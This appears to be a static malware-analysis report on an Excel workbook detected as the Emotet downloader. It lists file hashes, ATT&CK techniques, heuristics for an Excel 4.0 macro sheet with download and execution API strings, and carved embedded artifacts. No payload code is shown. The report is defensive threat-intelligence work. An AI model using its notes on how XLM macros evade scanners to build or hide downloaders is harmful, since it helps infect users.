Emotet — Office (OOXML) / .XLSX malware analysis

Static analysis result for SHA-256 e54aa8ec8fd7e129…

MALICIOUS

Office (OOXML) / .XLSX

1.20 MB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2022-04-29
MD5: 9d961627266e2e766ede4e5fb64d5e92 SHA-1: 652cb243c3880516ec7f507a5c129ec8fa670acc SHA-256: e54aa8ec8fd7e12981bbf0a0c54da1a6eac427b86b221979f5efb576d8bc0d32
200 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The critical heuristic 'OOXML_XLM_BINARY_WINAPI_STRINGS' indicates the presence of binary Excel 4.0 macros that contain WinAPI and download strings. The extracted script content shows attempts to create directories using 'CreateDirectoryA' and potentially execute files from paths like 'C:\Jugfstati\Nydyzba.ooocxx'. This behavior is consistent with a downloader, and the ClamAV detection explicitly names Emotet, aligning with the observed techniques.

Heuristics 4

  • Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks. The macro sheet is stored as XLSB/BIFF12 binary content, which many XML-only OOXML scanners miss.
  • Binary XLM macro sheet with WinAPI/download strings critical OOXML_XLM_BINARY_WINAPI_STRINGS
    Excel 4.0 macro sheet is stored as BIFF12/XLSB binary data and contains Win32 download or process-execution API strings such as URLDownloadToFileA, ShellExecuteA, or CreateDirectoryA. These strings are high-signal in XLM macro sheets and catch payload-download macros that XML-formula scanners cannot parse.
  • ClamAV: Xls.Downloader.Emotet-OOXML_XL-af43432fbcb8603c-9980048-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Downloader.Emotet-OOXML_XL-af43432fbcb8603c-9980048-0
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
ooxml_oleobject_00.bin
4bad71bbe5a530a4ecb623fd5daea8cac187a6dc6f61565c470ee7261327c19f		 ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 2706944 bytes
ooxml_oleobject_00_ole10native_00.bin
908a9061823bfb3e7f9f6928ed4da796b96e6132468adee38685b01e1078a8c7		 ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 2683300 bytes
emf_00.emf
33c042ac8babe18b25e94413a9c9fb98a54bbce22a09d1e6fd07f6be12b2b5ec		 ooxml-emf OOXML EMF part: xl/media/image1.emf 5367000 bytes
xlm_sheet_00.bin
87833ac5dd31547f952341facc430f1957f03f6a8fc0ad92753af33aeaac7613		 xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.bin 2427 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.